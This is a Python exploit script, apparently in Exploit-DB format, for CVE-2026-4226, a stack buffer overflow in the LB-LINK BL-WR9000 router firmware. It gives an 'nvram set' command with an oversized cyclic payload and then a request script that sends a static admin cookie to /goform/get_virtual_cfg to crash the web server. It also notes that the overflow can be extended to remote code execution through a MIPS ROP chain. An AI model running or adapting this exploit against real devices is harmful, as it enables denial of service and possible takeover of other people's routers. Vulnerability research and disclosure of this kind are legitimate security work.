#!/usr/bin/env python3
# Exploit Title: LB-LINK BL-WR9000 - Stack-based Buffer Overflow in /goform/get_virtual_cfg
# CVE: CVE-2026-4226
# Date: 2026-03-16
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.lb-link.com/
# Software Link: https://www.b-link.net.cn/downloads_16.html (firmware archives)
# Affected: LB-LINK BL-WR9000 firmware V2.4.9 (and likely similar models using libshare-0.0.26.so)
# Tested on: LB-LINK BL-WR9000 V2.4.9 (2023-06-20 build)
# Category: Remote
# Platform: Embedded (MIPS)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 8.8 (High) - Estimated (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) based on VulDB EUVD-2026-12367
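# Description: Stack-based buffer overflow via an oversized NVRAM "ForwardRules"/"VirtualRules" value parsed by bs_GetVirtualSerInfo (sub_44E8D0) using unbounded sscanf. The author labels it "Unauthenticated/post-auth": storing the oversized value requires admin access (see Notes below, and PR:L in the CVSS vector above), while the trigger request itself carries only a static cookie. Allows DoS (web server crash) and potential RCE with ROP on MIPS architecture.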
# Fixed in: No official patch known as of 2026-03-16; vendor unresponsive per VulDB
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Options:
# -- (no command-line args; edit TARGET/Cookie in code)
#
# Notes:
# • Requires prior admin access (web/telnet/SSH) to set oversized NVRAM value
# • Demonstrates reliable crash (DoS); extendable to full RCE via MIPS ROP chain
# • Reachable remotely after NVRAM poisoning (e.g., via other config endpoints if chained)
#
# How to Use
#
# Step 1:
# Inject malicious payload into NVRAM (via web UI, telnet, SSH, or nvram commands):
# nvram set ForwardRules '192.168.0.1,1111,111,aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaaj'
# nvram commit
#
# Step 2:
# Trigger the overflow remotely by running:
# python3 exploit.py
# (web interface becomes unresponsive until reboot)
import requests
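# Trigger request for the /goform/get_virtual_cfg handler. Per the header, the
# handler parses the stored "ForwardRules"/"VirtualRules" NVRAM value with an
# unbounded sscanf, so this GET only has an effect once an oversized value has
# been stored on the device.
TARGET = "http://192.168.16.1"
PAYLOAD_URL = f"{TARGET}/goform/get_virtual_cfg"

# No explicit "Host" entry: requests derives it from TARGET, so editing TARGET
# cannot leave a stale Host value behind.
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": f"{TARGET}/admin/main.html",
    # Static value supplied by the author. NOTE(review): whether the firmware
    # checks this against a real session is not visible here -- confirm.
    "Cookie": "user=admin; platform=0",
    "Connection": "keep-alive",
}

print("[+] Sending trigger to /goform/get_virtual_cfg ...")
try:
    r = requests.get(PAYLOAD_URL, headers=headers, timeout=5)
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
    # A dropped connection or a timeout is what a crashed web server looks
    # like, but an unreachable or filtered host looks the same. Treat this as
    # "consistent with a crash" and confirm from the device side.
    print(f"[!] No response from web service (crashed, or host unreachable): {e}")
except requests.exceptions.RequestException as e:
    # Any other client-side failure (bad URL, redirect loop, ...) says nothing
    # about the state of the device.
    print(f"[!] Request failed: {e}")
else:
    # The handler returned, so the stored value did not overflow the buffer
    # (or this firmware build is not affected).
    print(f"Status: {r.status_code}")
    print(r.text[:500])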